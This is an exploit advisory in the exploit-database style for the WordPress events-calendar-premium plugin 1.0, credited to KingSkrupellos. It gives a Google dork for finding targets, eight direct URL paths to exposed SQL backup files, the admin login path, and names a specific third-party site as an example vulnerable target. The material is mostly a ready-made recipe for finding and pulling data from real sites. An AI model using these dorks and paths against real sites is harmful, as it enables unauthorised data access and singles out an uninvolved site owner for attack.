################################################################################################# # Exploit Title : WordPress events-calendar-premium Plugins 1.0 Database Backup Information Disclosure Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 30/11/2018 # Vendor Homepage : wordpress.org # Tested On : Windows and Linux # Category : WebApps # Version Information : 1.0 # Google Dorks : inurl:''/wp-content/plugins/events-calendar-premium/zipcodes/'' # Exploit Risk : Medium # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ] ################################################################################################# # Admin Panel Login Path : /wp-login.php # Exploit : /wp-content/plugins/events-calendar-premium/zipcodes/wp_zipcodes.sql /wp-content/plugins/events-calendar-premium/zipcodes/wp_zipcodes1.sql /wp-content/plugins/events-calendar-premium/zipcodes/wp_zipcodes2.sql /wp-content/plugins/events-calendar-premium/zipcodes/wp_zipcodes3.sql /wp-content/plugins/events-calendar-premium/zipcodes/wp_zipcodes4.sql /wp-content/plugins/events-calendar-premium/zipcodes/wp_zipcodes5.sql /wp-content/plugins/events-calendar-premium/zipcodes/wp_zipcodes6.sql /wp-content/plugins/events-calendar-premium/zipcodes/wp_zipcodes7.sql ################################################################################################# # Example Vulnerable Site => [+] centinelafeed.com/1stcarevets/wp-content/plugins/events-calendar-premium/zipcodes/wp_zipcodes.sql ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################